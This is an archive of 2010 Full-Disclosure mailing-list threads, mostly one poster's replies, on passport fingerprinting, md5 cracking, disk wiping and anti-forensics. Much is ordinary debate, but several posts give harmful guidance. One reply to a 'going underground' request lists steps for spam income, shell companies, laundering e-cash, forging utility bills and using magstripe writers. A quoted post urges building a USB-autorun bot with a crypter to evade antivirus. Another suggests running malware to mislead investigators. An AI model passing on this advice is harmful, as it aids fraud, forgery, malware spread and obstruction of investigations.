Secunia - http://secunia.com/
Re: [Full-disclosure] Fingerprinting Paper with Laser
So your proposition is that the passport manufacturers all use laser beams on each passport they create and that this whitelist be somehow distributed to each and every airport and border check-point? lol. How bout we just let them get PKI right first. -Travis On Thu, Mar 18, 2010 at 12:03 PM, james o' hare jamesohar...@googlemail.com wrote: On Thu, Mar 18, 2010 at 3:36 PM, T Biehn tbi...@gmail.com wrote: Ridiculous. Generate some valid, non-far-fetched use-cases to justify this if I'm wrong. The Mossad going to Dubai and assassinating people in hotel rooms, then I'm all for it. They used false British passports, and you wonder why we want to have these technologies? Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
I've heard about these ninjas, the only way to escape their powers is a ten-strip to your face. On Tue, Mar 2, 2010 at 11:19 AM, Benji m...@b3nji.com wrote: If Yahoo has ninjas, what does Google have ?! @#! Sent from my iPhone On 2 Mar 2010, at 16:08, James Rankin kz2...@googlemail.com wrote: Mini Ninjas! On 2 March 2010 16:06, valdis.kletni...@vt.edu wrote: On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Going underground, living out of backpack, etc?
Simon: What you need is a constant source of income. I suggest you study TAO Spam (more than just inboxing, mind you.) You will need an anonymous corporation for fund intake. You will want a business bank account. You will want to transfer the funds that come into your account into electronic cash. You will want to mix this cash about. You will want to lose and create these companies often. Expect to take a 35% (conservative figure) hit on all profit for exchange services. Be sure to know your way around high quality printing and photoshop. Have a large database of Water Electric bills. Invest in a lamination machine. Invest in a magstrip writer logger, invest in a smartcard season logger/reader/writer. Learn how to solder. Learn how to do fast-low cost fabrication. Acquaint yourself with prepaid visa gift cards and e-cash debit cards. Acquaint yourself with online (re-)mailing services. Dispose of all digital equipment you already own and buy new kit with prepaid visa gift cards or cash. Perform activations at wifi spots, don't make the mistake of being in the view of security cameras. Remove their batteries. Relocate and disappear. Do not contact friends and family. If you operate online do not use a constant pseudonym. -Travis On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras uuf6...@gmail.com wrote: Start by not touching any kind of digital device. You wouldn't know how many chinese have put tracking/spy bugs inside them. Or how many modified NSA backdoors, for the matter. Using a PC probably increases risk by 1000%. On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle lolweb...@hush.ai wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello. I am interested in getting some advice from you security professionals (white hat and black hat) about going underground. I am sick of big brother, I love independence, I was to experience the world and have no commitments. I am just sick of being held down in one place. It's too easy for people to harass and stalk you. You gotta be mobile. Fancy free and foot loose. You gotta be underground. Have any advice for living out of a bag? Any stories? Any lessons? -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkuLR3UACgkQRQnwIcxK0rKdJwP9Fbv4ENsN+ouzbn34owsypykpL00+ E1qCZBwZGD4EJ5QK6PKdyR3kc33hOOasqaWn+HQVX1OtdKa/bXwWCJw3b3bEbImPHHoM FSfO7mJsrifYsufZcXtgRgFOI3KA7W+cN1DHncawcBf5/7CNKrjXSVi2NewLsp7beFlM gJrMvYw= =ii33 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: steathbomb
Alzo see: USB DMA. On Fri, Feb 26, 2010 at 8:29 AM, McGhee, Eddie eddie.mcg...@ncr.com wrote: Its simply using USB autorun to launch and install itself, not sure how much it is picked up but tbh you could build one yourself possibly with the features you need, just look into getting some decent bot source and go from there, would save the 130 dollars imo. Plenty source code out there to make one these, in fact, I think I will make a guide on it if I get around to it with a stripped down bot, the only thing you really need to worry about is detection, if you have the know how build yourself a decent crypter and make sure no one gets a hold of it to keep detections down. phed -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM Sent: 26 February 2010 12:36 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Fwd: steathbomb anyone see this and know about it? How it works and good detection? http://www.brickhousesecurity.com/pc-computer-spy.html -- been great, thanks RandyM a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Why
Jonathan, There are a few things you can do if the target of a government investigation. First and foremost you must acquaint yourself with the preeminent guide to the infinite investigative journeys: Kafka's The Trail. If you are lacking in literary concentration Orson Welles directed a very excellent screenplay version of the novel. The best recommendation I can afford is to leave the country. If your life has been ruined and your friends and family have been badgered you have nothing to lose. Your personal and professional lives are nil. Restart in a new country. The second best recommendation is to adopt the 24/7 surveillance as a sort of warm big-brother security blanket, intentionally insert yourself in dangerous situations, the men who are watching you are bound by law to intercede to save your life. Tell people that you're being watched, make sure you have proof of surveillance so they don't think you're crazy. Let them know that it's a farce, you've done nothing wrong. You might find that you can attract certain types of women by sharing your unique problem with them, I'd suggest you start with the Yoga, new age groups full of bored household wives at your local gym. On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras uuf6...@gmail.com wrote: @Jonny - No, I meant that you should write books. My mistake. Obviously. On Fri, Feb 19, 2010 at 11:26 PM, Benji m...@b3nji.com wrote: Where should I send the cheque so that the funds may be released? On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham n3t...@hush.ai wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 man someone please help me On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham n3t...@hush.ai wrote: I mean to say, my life is being vivisected. They are pulling my life apart in layers like string cheese. It's quite uncomfortable. On Fri, 19 Feb 2010 21:57:52 + Thor (Hammer of God) t...@hammerofgod.com wrote: Vivisected like string cheese? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan Barningham Sent: Friday, February 19, 2010 1:51 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Why -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello. I used to be online friends with a subject of an FBI investigation. (Not saying who for my safety) I suppose I could be of assistance in his arrest and prosecution, however, they didn't approach me that way. They approached me years after I changed my life, in a very heavy handed way. Steven Hatfill like, but with local cops. (Clearly, I'm being ambiguous to protect my anonymity) Add a little ambiguity and locals with hitlists against me from my younger years, That's all it takes. In truth it's not just MIB, it's local police back where I used to live. I'm not going to be arrested obviously, but the constant bullying, harassment, surveillance, pretexts and entrapment attempts is mind- numbing and painful. I'm not some bad guy. I feel so deeply hurt. FBI? Stories in specific? A provocateur sent to paint me like a cyberterrorist. My life being vivisected like string cheese. My humble, peaceful lifestyle being sensationalised and scrutinized by ignorant Jack Baeur's and inept bureaucrats. My friends are terrified, it's like they have a knife to their throat -- that is the one's that stook up for me and got threatened. The more gullible one's comply like the milgrim experiment and give oscar winning performances. Never knew my innocuous life could be spun to make me look like a mobster. I just want to be left alone. I can't even make friends or girlfriends because cops will just go to them and take them from me. I am an amicable man and I can't be free without them threatening the one's I love and turning htem against me. I feel so hopeless I'm unsure if they can even articulate a legal reason to justify such harassment. But that's the power of a runaway fishing expedition. I wish I could just sue those bastards. @#$! Appreciate your concern P.S. Any of you whitehats have an idea what I can do here? On Tue, 16 Feb 2010 15:43:46 + ja...@smithwaysecurity.com wrote: Hello, So why are the Feds or and homeland security up your ass so much. What is it you know they want you to keep quite about. Sent from my iPhone -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkt/B6wACgkQwGoky+I7Eotz8AP9G7hxnNGbyhoCdIXUY1oPdVuCY1 h c dWDNA9hqeqVgxAVL9+LH6gOLn6VBsZ5R3Yem6VnRu1o4zJvVmNynxJ6kVdQq1T4nFd t U 1gWqHZTyUOw3xnulU5g7mA3xk3t1Xirc7eWXKAY5X645OGRzUfd1Om6Ujaie0Bomq9 6 Y Po4AzrQ= =hs4y -END PGP SIGNATURE- ___
Re: [Full-disclosure] Why
Kafka's The *Trial. My sincere apologies. On Mon, Feb 22, 2010 at 12:51 PM, T Biehn tbi...@gmail.com wrote: Jonathan, There are a few things you can do if the target of a government investigation. First and foremost you must acquaint yourself with the preeminent guide to the infinite investigative journeys: Kafka's The Trail. If you are lacking in literary concentration Orson Welles directed a very excellent screenplay version of the novel. The best recommendation I can afford is to leave the country. If your life has been ruined and your friends and family have been badgered you have nothing to lose. Your personal and professional lives are nil. Restart in a new country. The second best recommendation is to adopt the 24/7 surveillance as a sort of warm big-brother security blanket, intentionally insert yourself in dangerous situations, the men who are watching you are bound by law to intercede to save your life. Tell people that you're being watched, make sure you have proof of surveillance so they don't think you're crazy. Let them know that it's a farce, you've done nothing wrong. You might find that you can attract certain types of women by sharing your unique problem with them, I'd suggest you start with the Yoga, new age groups full of bored household wives at your local gym. On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras uuf6...@gmail.com wrote: @Jonny - No, I meant that you should write books. My mistake. Obviously. On Fri, Feb 19, 2010 at 11:26 PM, Benji m...@b3nji.com wrote: Where should I send the cheque so that the funds may be released? On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham n3t...@hush.ai wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 man someone please help me On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham n3t...@hush.ai wrote: I mean to say, my life is being vivisected. They are pulling my life apart in layers like string cheese. It's quite uncomfortable. On Fri, 19 Feb 2010 21:57:52 + Thor (Hammer of God) t...@hammerofgod.com wrote: Vivisected like string cheese? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan Barningham Sent: Friday, February 19, 2010 1:51 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Why -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello. I used to be online friends with a subject of an FBI investigation. (Not saying who for my safety) I suppose I could be of assistance in his arrest and prosecution, however, they didn't approach me that way. They approached me years after I changed my life, in a very heavy handed way. Steven Hatfill like, but with local cops. (Clearly, I'm being ambiguous to protect my anonymity) Add a little ambiguity and locals with hitlists against me from my younger years, That's all it takes. In truth it's not just MIB, it's local police back where I used to live. I'm not going to be arrested obviously, but the constant bullying, harassment, surveillance, pretexts and entrapment attempts is mind- numbing and painful. I'm not some bad guy. I feel so deeply hurt. FBI? Stories in specific? A provocateur sent to paint me like a cyberterrorist. My life being vivisected like string cheese. My humble, peaceful lifestyle being sensationalised and scrutinized by ignorant Jack Baeur's and inept bureaucrats. My friends are terrified, it's like they have a knife to their throat -- that is the one's that stook up for me and got threatened. The more gullible one's comply like the milgrim experiment and give oscar winning performances. Never knew my innocuous life could be spun to make me look like a mobster. I just want to be left alone. I can't even make friends or girlfriends because cops will just go to them and take them from me. I am an amicable man and I can't be free without them threatening the one's I love and turning htem against me. I feel so hopeless I'm unsure if they can even articulate a legal reason to justify such harassment. But that's the power of a runaway fishing expedition. I wish I could just sue those bastards. @#$! Appreciate your concern P.S. Any of you whitehats have an idea what I can do here? On Tue, 16 Feb 2010 15:43:46 + ja...@smithwaysecurity.com wrote: Hello, So why are the Feds or and homeland security up your ass so much. What is it you know they want you to keep quite about. Sent from my iPhone -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkt/B6wACgkQwGoky+I7Eotz8AP9G7hxnNGbyhoCdIXUY1oPdVuCY1 h c dWDNA9hqeqVgxAVL9+LH6gOLn6VBsZ5R3Yem6VnRu1o4zJvVmNynxJ6kVdQq1T4nFd t U
Re: [Full-disclosure] anybody know good service for cracking md5?
Rainbowcrack-Online was doing precomp dictionary attacks in conjunct with rainbowtables in 2k5. The hype spike for RC tables was back in 2k4. You're off by 5 years Christian. -Travis On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie eddie.mcg...@ncr.com wrote: Are you serious? People have been using rainbow tables for years mate.. and they are rather widely used.. no need to replace useful with anything, the statement was plain wrong.. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 04 February 2010 12:06 To: Anders Klixbull Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu Subject: Re: [Full-disclosure] anybody know good service for cracking md5? FINE. Replace useful with widely popular. On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull a...@experian.dk wrote: lol they have been useful for years son just because YOU never found a use for them doesn't mean noone else has :) From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: 4. februar 2010 13:00 To: Anders Klixbull Cc: valdis.kletni...@vt.edu; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] anybody know good service for cracking md5? Uh, in the sense that they are finally becoming actually useful... On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull a...@experian.dk wrote: seems to be cropping in? as far as know rainbow tables has been around for years... From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 3. februar 2010 23:02 To: valdis.kletni...@vt.edu Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] anybody know good service for cracking md5? Actually dictionary attacks seem to work quite well, especially for common users which typically use dictionary and/or well known passwords (such as the infamous password). Another idea which seems to be cropping in, is the use of hash tables with a list of known passwords rather then dictionary approach. Personally, the hash table one is quite successful, consider that it targets password groups rather than a load of wild guesses. Cheers. On Wed, Feb 3, 2010 at 10:26 PM, valdis.kletni...@vt.edu wrote: On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: i find some sites which says that they can brute md5 hashes and WPA dumps for 1 or 2 days. Given enough hardware and a specified md5 hash, one could at least hypothetically find an input text that generated that hash. However, that may or may not be as useful as one thinks, as you wouldn't have control over what the text actually *was*. It would suck if you were trying to crack a password, and got the one that was only 14 binary bytes long rather than the one that was 45 printable characters long. ;) Having said that, it would take one heck of a botnet to brute-force an MD5 has in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would take on the order of 10**22 years. If all 140 million zombied computers on the internet were trying 1 billion keys per second, that drops it down to 10**16 years or so - or about 10,000 times the universe has been around already. I suspect they're actually doing a dictionary attack, which has a good chance of succeeding in a day or two. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
No you don't understand, your premise is shit. Research what's already being done instead of trying to improve what you don't understand. lol @ ddos. On Jan 26, 2010 11:09 PM, Bipin Gautam bipin.gau...@gmail.com wrote: Enough noise, Lets wrap up: Someone said: Forensics requires more than merely finding a phrase or file on a hard drive - it requires establishing the context. If a court accepts evidence without that context, then the defendant should appeal on the basis of having an incompetent lawyer. So, any evidence/broken-text/suspicious phrases etc found in a computer without meta-data maybe USELESS... REMEMBER. Having a normal OS with forensic signature ZERO would be a simple yet powerful project. Programmers??? it isnt difficult work. few months, 1 person project. Worm defense is smart as well as deadlock at times, the prospective i presented can be used as a FALLBACK at times. Maybe something like Alice/chatterbox run through the free/slack/etc... space of your 1 TB harddisk is a intellectual dDoS! ___ Full-Disclosure - We believe in it. Charter: http:/... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
You made the argument against youself; apparently you didn't comprehend the points made in 90% of the on-topic responces to this thread. On Jan 27, 2010 9:34 AM, Bipin Gautam bipin.gau...@gmail.com wrote: McGhee T Biehn ! Thankyou for putting up your best argument sadly that is the BEST technical thing you happen to pick. in this topic to comment about -bipin On 1/27/10, McGhee, Eddie eddie.mcg...@ncr.com wrote: and also lol @ maybe USELESS, try making ... bipin.gau...@gmail.commailto:bipin.gau...@gmail.com wrote: Enough noise, Lets wrap up: ... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Bipin. I am familiar with LUKS (DMCRYPT), SecurStar's DCPP, TrueCrypt, PGP Desktop, Windows EFS and all manners of configurations of those products, including the hidden container features of DCPP and TC. I am familiar with computer forensics, computer forensic methods, and anti-forensics. Furthermore I have working knowledge of the various one-way hashes, symmetric and asymmetric encryption algorithms. Working knowledge of the various block-cipher modes and what the differences are between them. From firsthand experience with the courts I am familiar with their tool dependence and what they can and cannot grab and why. From simple logic it is plain to see that filling a drive with content from wikipedia, some n-gram algorithm or other source would be worthless. A waste of time and effort. This is because a drive full of zeros, a drive full of random bits and a drive full of random word garbage are equivalent. Some obfuscating filesystem that does -not- use encryption is as worthless as a generic F-S. If the content on your drive is worth grabbing the investigating authorities can and will reverse engineer it. As everyone has told you, encrypt with a FDE product from the start or simply wipe your drive to nulls or garbage. If you are very paranoid use my solution of a hidden container containing a VM that you use for anything 'private.' Make sure your host OS has a ream of malware running on it preferably pointed to non-existent CC channels, or using PKI where which nobody has the private key. -Travis On Wed, Jan 27, 2010 at 11:18 AM, Bipin Gautam bipin.gau...@gmail.com wrote: Really? How much do you know of computer forensics? Care to Double clicked a few forensic tools first I bring up this issue here because as you can see the laws are different in different country and at places just possession of a questionable content is a crime, without much analysis from where did it come from. Such a logic doesnt hold much water from a technical prospective, that is what i was trying to discuss. (but you were so much concerned about my english lol ) We were talking on a NEW topic, But if truecrypt is all you know, then download truecrypt and add a custom cascade of ciphers to your truecrypt source code... so that your truecrypt hidden volume will be very hard to bruteforced with off the self tools (which is what most forensic examiners do, they are tool dependent). (i wish to make fun of you, but maybe another email! ;) -bipin On 1/27/10, T Biehn tbi...@gmail.com wrote: You made the argument against youself; apparently you didn't comprehend the points made in 90% of the on-topic responces to this thread. On Jan 27, 2010 9:34 AM, Bipin Gautam bipin.gau...@gmail.com wrote: McGhee T Biehn ! Thankyou for putting up your best argument sadly that is the BEST technical thing you happen to pick. in this topic to comment about -bipin On 1/27/10, McGhee, Eddie eddie.mcg...@ncr.com wrote: and also lol @ maybe USELESS, try making ... bipin.gau...@gmail.commailto:bipin.gau...@gmail.com wrote: Enough noise, Lets wrap up: ... -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Entropy vs zeros vs random content. Plausible deniability will only be there if there is legitimate data that looks like it's been used and the prosecutor cannot construe any of your data as that used for wiping or otherwise obscuring the data on your drive. If you don't have this you better request a trial by judge rather than jury. Now; Your best solution is to use an exterior OS on FDE, then, in a TC Hidden Disk container have a VM image that you use for 'hidden works.' You can hand over your FDE's PW and location of TC disk including the exterior password for great fed win. -Travis On Tue, Jan 26, 2010 at 10:08 AM, Michael Holstein michael.holst...@csuohio.edu wrote: By the way, does somebody knows about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable? No, wear-leveling (done at the memory controller level) will dynamically re-map addresses on the actual flash chip to ensure a relatively consistent number of write cycles across the entire drive. The only way to completely wipe a flash disk is with a hammer. Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Oh yeah, another note: If you use a chaining block cipher than you only need to wipe the first block to make the rest of your data unrecoverable. Most FDE's actually use a pw to decrypt the actual decryption key, that block functions much the same, if you can wipe that then the rest of the data is unusable. Note, anyone who has pulled your key from memory via trojan or other means at an earlier time will be able to recover your data unless the first block of the stream has been wiped. This might be common practice in sneak and peek routines. -Travis On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com wrote: I was thinking, since all this (reasonable) fuss on wiping a disk over 10 times to ensure non-readability, how come we're yet very limited on space usage? If, for example, I overwrote a bitmap file with a text one, what stops the computer from recovering/storing both (without using additional space)? Just a couple curiosities of mine. On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein michael.holst...@csuohio.edu wrote: By the way, does somebody knows about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable? No, wear-leveling (done at the memory controller level) will dynamically re-map addresses on the actual flash chip to ensure a relatively consistent number of write cycles across the entire drive. The only way to completely wipe a flash disk is with a hammer. Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Overwritten files require analysis with a 'big expensive machine.' I doubt they ever recover the full file. -Travis On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com wrote: I was thinking, since all this (reasonable) fuss on wiping a disk over 10 times to ensure non-readability, how come we're yet very limited on space usage? If, for example, I overwrote a bitmap file with a text one, what stops the computer from recovering/storing both (without using additional space)? Just a couple curiosities of mine. On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein michael.holst...@csuohio.edu wrote: By the way, does somebody knows about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable? No, wear-leveling (done at the memory controller level) will dynamically re-map addresses on the actual flash chip to ensure a relatively consistent number of write cycles across the entire drive. The only way to completely wipe a flash disk is with a hammer. Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Are you suggesting that consumer magnet-based storage solutions use the same technology that the recovery machines use to store more than one bit in what you consider a 'single bit location' ? I think it would be cost and space prohibitive, not dependent on any algorithm. If I'm thinking correctly, and I have no real idea how the recovery process works, the recovery machines measure minute variance in the analog magnetic signal directly pulled from the platters to figure out what bits 'used' to be on the disk in that location. I sincerely doubt that anything consumer accessible would be able to work with that. I also doubt that it is exact, and protocols probably use probabilistic methods for extraction of a given content; text for example. Given a block of bits, the signal variance from 'clean' on those bits (eg if never written) is x. x is matched with a dictionary of known text. Anyone know to confirm? -Travis On Tue, Jan 26, 2010 at 11:15 AM, Christian Sciberras uuf6...@gmail.com wrote: It would be a part of the algorithm, to make sure the overwritten file is readable. But if those machines get any smaller, I guess these would be the next generation of storage media take bluerays vs dvds for example. On Tue, Jan 26, 2010 at 5:11 PM, T Biehn tbi...@gmail.com wrote: Overwritten files require analysis with a 'big expensive machine.' I doubt they ever recover the full file. -Travis On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com wrote: I was thinking, since all this (reasonable) fuss on wiping a disk over 10 times to ensure non-readability, how come we're yet very limited on space usage? If, for example, I overwrote a bitmap file with a text one, what stops the computer from recovering/storing both (without using additional space)? Just a couple curiosities of mine. On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein michael.holst...@csuohio.edu wrote: By the way, does somebody knows about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable? No, wear-leveling (done at the memory controller level) will dynamically re-map addresses on the actual flash chip to ensure a relatively consistent number of write cycles across the entire drive. The only way to completely wipe a flash disk is with a hammer. Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
I should have brought up the increased density problem Valdis, excellent points. -Travis On Tue, Jan 26, 2010 at 1:26 PM, valdis.kletni...@vt.edu wrote: On Tue, 26 Jan 2010 11:11:52 EST, T Biehn said: Overwritten files require analysis with a 'big expensive machine.' Assuming a disk drive made this century, if the block has actually been overwritten with any data even *once*, it is basically unrecoverable using any available tech. Proof: In a decade of looking, I haven't found a *single* data-recovery outfit that claimed to recover from even a single overwrite. Blown partition table? No problem. Metadata overwritten, data not? We can scavenge the blocks. Disk been in a fire? Flood? Run over by truck? Sure. We can go in and scavenge the individual intact bits with big expensive machines. Overwritten? crickets. Seriously - lot of companies can recover data by reading the magnetic fields of intact data. But anybody know of one that claims it can recover actual over-writes, as opposed to damn we erased it or damn the first part of the disk is toast? No? Nobody knows of one? I didn't think so. 20 or 25 years ago, it may still have been feasible to use gear to measure the residual magnetism in the sidebands after an over-write. However, those sidebands have shrunk drastically, as they are the single biggest problem when trying to drive densities higher. You can't afford a sideband anymore - if you have one, it's overlapping the next bit. There *may* be some guys inside the spook agencies able to recover overwrites. But you don't need to worry about any evidence so recovered ever being used against you in a court of law - as then they'd have to admit they could do it. Just like in WWII we allowed the German U-boats to sink our convoys rather than let them figure out we had broken Enigma, they'll let the prosecution fail rather than admit 